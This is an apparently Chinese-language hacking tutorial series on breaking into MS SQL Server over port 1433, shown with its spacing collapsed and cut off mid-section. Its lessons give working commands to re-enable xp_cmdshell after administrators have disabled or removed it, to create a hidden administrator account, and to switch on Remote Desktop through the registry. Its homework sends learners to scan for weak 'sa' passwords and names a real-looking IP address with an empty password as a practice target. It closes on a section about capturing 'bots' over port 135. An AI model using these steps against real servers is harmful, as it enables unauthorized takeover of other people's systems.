1433手工入侵系列教程第二课：修复ErrorMessage:未能找到存储过程'master..xp_cmdshell'。错误环境：本机xp服务器2003工具：1.弱口令扫描器sql连接器Sql查询分析器服务器一台要完成的任务：修复错误ErrorMessage:未能找到存储过程'master..xp_cmdshell'。修复方法：xp_cmdshell新的恢复办法第一步先删除：dropproceduresp_addextendedprocdropproceduresp_oacreateexecsp_dropextendedproc'xp_cmdshell'第二步恢复：dbccaddextendedproc("sp_oacreate","odsole70.dll")dbccaddextendedproc("xp_cmdshell","xplog70.dll")直接恢复，不管sp_addextendedproc是不是存在课程总结：作业：自己扫描1433弱口令。尝试一下实例：124.130.109.251sa""要完成的任务：修复错误拒绝访问修复方法：Net1Dirnet.exe/s/p第五课：修复ErrorMessage:SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用'xp_cmdshell'。有关启用'xp_cmdshell'的详细信息，请参阅SQLServer联机丛书中的"外围应用配置器"。错误修复方法：;EXECsp_configure'showadvancedoptions',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure'xp_cmdshell',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure'showadvancedoptions',0--第六课修复错误ErrorMessage:无法装载DLLxpweb70.dll或该DLL所引用的某一DLL。原因:126(找不到指定的模块。)修复方法：第一步execsp_dropextendedproc'xp_cmdshell'第二步dbccaddextendedproc("xp_cmdshell","c:\ProgramFiles\MicrosoftSQLServer\MSSQL\Binn\xplog70.dll");EXECsp_configure'showadvancedoptions',0--第七课要完成的任务：修复错误ErrorMessage:无法在库xpweb70.dll中找到函数xp_cmdshell。原因:127(找不到指定的程序。)。修复方法：第一步execsp_dropextendedproc'xp_cmdshell'第二步dbccaddextendedproc("xp_cmdshell","c:\ProgramFiles\MicrosoftSQLServer\MSSQL\Binn\xplog70.dll");EXECsp_configure'showadvancedoptions',0--1433手工入侵系列教程第八课：开启3389终端开3389：提权用户名netuseradmin%123/add破解用户：netlocalgroupadministatorsadmin%/addCmd命令REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/fSql命令开3389execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections','REG_DWORD',0;--关3389：execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections','REG_DWORD',1;135抓鸡命令抓鸡环境NTLMSECURITYSUPPORTPROVIDERREMOTEPROCEDURECALL(R